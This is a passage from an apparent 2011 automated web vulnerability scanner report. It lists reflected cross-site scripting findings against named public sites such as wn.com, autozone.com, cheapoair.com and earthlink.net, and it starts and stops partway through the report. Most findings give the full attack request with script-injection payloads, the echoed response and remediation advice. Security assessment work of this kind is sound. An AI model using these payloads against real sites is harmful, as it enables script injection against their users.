Path:   /41ff8%22%3E%3Cimg_src=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c4133(a)523feeaf72f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /41ff8%22%3E%3Cimg_srcc4133(a)523feeaf72f=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81 HTTP/1.1
Host: wn.com
Proxy-Connection: keep-alive
Referer: http://burp/show/4
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=35; __unam=6e7de7f-12f0d58c487-3a11fc86-1; __utmz=132968776.1301599015.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=132968776.437757365.1301599015.1301599015.1301599015.1; __utmc=132968776; __utmb=132968776.2.10.1301599015; __qca=P0-176382732-1301599015354

Response

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 19:18:25 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 63109


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script
...[SNIP]...
<img srcc4133(a)523feeaf72f=a onerror=alert("xss")>
...[SNIP]...

2.39. http://wn.com/a [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wn.com
Path:   /a

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 366bc"><img%20src%3da%20onerror%3dalert(1)>b831c38def6 was submitted in the REST URL parameter 1. This input was echoed as 366bc"><img src=a onerror=alert(1)>b831c38def6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /a366bc"><img%20src%3da%20onerror%3dalert(1)>b831c38def6 HTTP/1.1
Host: wn.com
Proxy-Connection: keep-alive
Referer: http://wn.com/41ff8%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Ef8c4a59ad81
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=35; __unam=6e7de7f-12f0d58c487-3a11fc86-1

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 19:16:38 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 61091


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script
...[SNIP]...
<link href="http://rss.wn.com/English/keyword/a366bc"><img src=a onerror=alert(1)>b831c38def6" rel="alternate" type="application/rss+xml" title="A366bc >
...[SNIP]...

2.40. http://wn.com/a [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://wn.com
Path:   /a

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e749"%3b0bb730aa15d was submitted in the REST URL parameter 1. This input was echoed as 6e749";0bb730aa15d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a6e749"%3b0bb730aa15d HTTP/1.1
Host: wn.com
Proxy-Connection: keep-alive
Referer: http://wn.com/41ff8%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Ef8c4a59ad81
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=35; __unam=6e7de7f-12f0d58c487-3a11fc86-1

Response

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 19:16:59 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 39608


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script
...[SNIP]...
<!--
window.playlist_name = "a6e749";0bb730aa15d";
window.playlist_id = null;
window.page_id = 1; // fixme
// -->
...[SNIP]...

2.41. http://wn.com/a [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://wn.com
Path:   /a

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 457a8'%3b804150ed024 was submitted in the REST URL parameter 1. This input was echoed as 457a8';804150ed024 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a457a8'%3b804150ed024 HTTP/1.1
Host: wn.com
Proxy-Connection: keep-alive
Referer: http://wn.com/41ff8%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Ef8c4a59ad81
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=35; __unam=6e7de7f-12f0d58c487-3a11fc86-1

Response

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 19:17:02 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 39608


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script
...[SNIP]...
</h2>';
mc = new WNMovieCredits({
query: 'a457a8';804150ed024',
container: '#autoscroll',
startstring: ss,
linksfontcolor: '#' + linkcolor,
backgroundcolor: '#' + bgcolor,
endstring:
...[SNIP]...

2.42. http://wn.com/a [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://wn.com
Path:   /a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7b441<a%20b%3dc>89dc5b33732 was submitted in the REST URL parameter 1. This input was echoed as 7b441<a b=c>89dc5b33732 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /a7b441<a%20b%3dc>89dc5b33732 HTTP/1.1
Host: wn.com
Proxy-Connection: keep-alive
Referer: http://wn.com/41ff8%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Ef8c4a59ad81
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=35; __unam=6e7de7f-12f0d58c487-3a11fc86-1

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 19:17:16 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 63274


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script
...[SNIP]...
<div id="page_title" class="editable">A7b441<a B=c>89dc5b33732</div>
...[SNIP]...

2.43. http://wn.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wn.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41ff8"><img%20src%3da%20onerror%3dalert(1)>f8c4a59ad81 was submitted in the REST URL parameter 1. This input was echoed as 41ff8"><img src=a onerror=alert(1)>f8c4a59ad81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /41ff8"><img%20src%3da%20onerror%3dalert(1)>f8c4a59ad81 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: wn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 19:09:07 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 61060


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script
...[SNIP]...
<link href="http://rss.wn.com/English/keyword/41ff8"><img src=a onerror=alert(1)>f8c4a59ad81" rel="alternate" type="application/rss+xml" title="41ff8 >
...[SNIP]...

2.44. http://wn.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://wn.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fedb2<a%20b%3dc>565e8f18d9a was submitted in the REST URL parameter 1. This input was echoed as fedb2<a b=c>565e8f18d9a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fedb2<a%20b%3dc>565e8f18d9a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: wn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 19:09:40 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 63243


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script
...[SNIP]...
<div id="page_title" class="editable">Fedb2<a B=c>565e8f18d9a</div>
...[SNIP]...

2.45. http://wn.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://wn.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b31c7"%3b5277b8d6807 was submitted in the REST URL parameter 1. This input was echoed as b31c7";5277b8d6807 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b31c7"%3b5277b8d6807 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: wn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 19:09:31 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 39580


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script
...[SNIP]...
<!--
window.playlist_name = "b31c7";5277b8d6807";
window.playlist_id = null;
window.page_id = 1; // fixme
// -->
...[SNIP]...

2.46. http://wn.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://wn.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5f21'%3bf955b98c201 was submitted in the REST URL parameter 1. This input was echoed as a5f21';f955b98c201 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a5f21'%3bf955b98c201 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: wn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 19:09:33 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 39580


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script
...[SNIP]...
</h2>';
mc = new WNMovieCredits({
query: 'a5f21';f955b98c201',
container: '#autoscroll',
startstring: ss,
linksfontcolor: '#' + linkcolor,
backgroundcolor: '#' + bgcolor,
endstring:
...[SNIP]...

2.47. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c997d"-alert(1)-"1753c066b3c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=2356384&campId=5111946&chanId=237635541&placementId=59579605&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=c997d"-alert(1)-"1753c066b3c
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Thu, 31 Mar 2011 19:09:38 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BAE5DB4E6791EE2B4F409DAF37BE4156; Path=/
Connection: keep-alive
Content-Length: 8363


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://www.google.com/search?hl=en&q=c997d"-alert(1)-"1753c066b3c",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=5111946&chanId=237635541&placementId=59579605&pubId=1036126",
   debug : "fa
...[SNIP]...

2.48. http://aolnews.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aolnews.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81e0b"><script>alert(1)</script>d2aa656bcaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?81e0b"><script>alert(1)</script>d2aa656bcaa=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: aolnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:25:28 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 31 Mar 2011 19:55:28 GMT
Content-length: 146
Content-type: text/html
Location: http://www.aolnews.com/favicon.ico?81e0b"><script>alert(1)</script>d2aa656bcaa=1

<html>
<body>
Page relocated <a href="http://www.aolnews.com/favicon.ico?81e0b"><script>alert(1)</script>d2aa656bcaa=1">here.</a>
</body>
</html>

2.49. http://autozone.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autozone.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6abe4"><script>alert(1)</script>6dd780f0e74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico6abe4"><script>alert(1)</script>6dd780f0e74 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: autozone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object Moved
Location: http://www.autozone.com/favicon.ico6abe4"><script>alert(1)</script>6dd780f0e74
Content-Type: text/html
Cache-Control: private
Connection: close

<head><body> This object may be found <a HREF="http://www.autozone.com/favicon.ico6abe4"><script>alert(1)</script>6dd780f0e74">here</a> </body>

2.50. http://autozone.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autozone.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ba71"><script>alert(1)</script>f1205ff0f27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?1ba71"><script>alert(1)</script>f1205ff0f27=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: autozone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object Moved
Location: http://www.autozone.com/favicon.ico?1ba71"><script>alert(1)</script>f1205ff0f27=1
Content-Type: text/html
Cache-Control: private
Connection: close

<head><body> This object may be found <a HREF="http://www.autozone.com/favicon.ico?1ba71"><script>alert(1)</script>f1205ff0f27=1">here</a> </body>

2.51. http://cheapoair.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cheapoair.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb80f"><script>alert(1)</script>36ecf6a40e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icoeb80f"><script>alert(1)</script>36ecf6a40e7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: cheapoair.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object Moved
Location: http://www.cheapoair.com/favicon.icoeb80f"><script>alert(1)</script>36ecf6a40e7
Content-Type: text/html
Cache-Control: private
Connection: close

<head><body> This object may be found <a HREF="http://www.cheapoair.com/favicon.icoeb80f"><script>alert(1)</script>36ecf6a40e7">here</a> </body>

2.52. http://cheapoair.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cheapoair.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17bde"><script>alert(1)</script>cdefc57a4e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?17bde"><script>alert(1)</script>cdefc57a4e3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: cheapoair.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object Moved
Location: http://www.cheapoair.com/favicon.ico?17bde"><script>alert(1)</script>cdefc57a4e3=1
Content-Type: text/html
Cache-Control: private
Connection: close

<head><body> This object may be found <a HREF="http://www.cheapoair.com/favicon.ico?17bde"><script>alert(1)</script>cdefc57a4e3=1">here</a> </body>

2.53. http://earthlink.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://earthlink.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 404e1"><script>alert(1)</script>f6652ef6e3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico404e1"><script>alert(1)</script>f6652ef6e3e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: earthlink.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object Moved
Location: http://www.earthlink.net/favicon.ico404e1"><script>alert(1)</script>f6652ef6e3e
Content-Type: text/html
Cache-Control: private
Connection: close

<head><body> This object may be found <a HREF="http://www.earthlink.net/favicon.ico404e1"><script>alert(1)</script>f6652ef6e3e">here</a> </body>

2.54. http://earthlink.net/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://earthlink.net
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2225"><script>alert(1)</script>5edcb54f573 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?e2225"><script>alert(1)</script>5edcb54f573=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: earthlink.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object Moved
Location: http://www.earthlink.net/favicon.ico?e2225"><script>alert(1)</script>5edcb54f573=1
Content-Type: text/html
Cache-Control: private
Connection: close

<head><body> This object may be found <a HREF="http://www.earthlink.net/favicon.ico?e2225"><script>alert(1)</script>5edcb54f573=1">here</a> </body>

2.55. http://games.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b880"><script>alert(1)</script>640fd2a4017 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?4b880"><script>alert(1)</script>640fd2a4017=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: games.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:27:45 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 31 Mar 2011 19:57:45 GMT
Content-length: 144
Content-type: text/html
Location: http://www.games.com/favicon.ico?4b880"><script>alert(1)</script>640fd2a4017=1

<html>
<body>
Page relocated <a href="http://www.games.com/favicon.ico?4b880"><script>alert(1)</script>640fd2a4017=1">here.</a>
</body>
</html>

2.56. http://newegg.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newegg.com
Path:   /favicon.ico

Issue detail

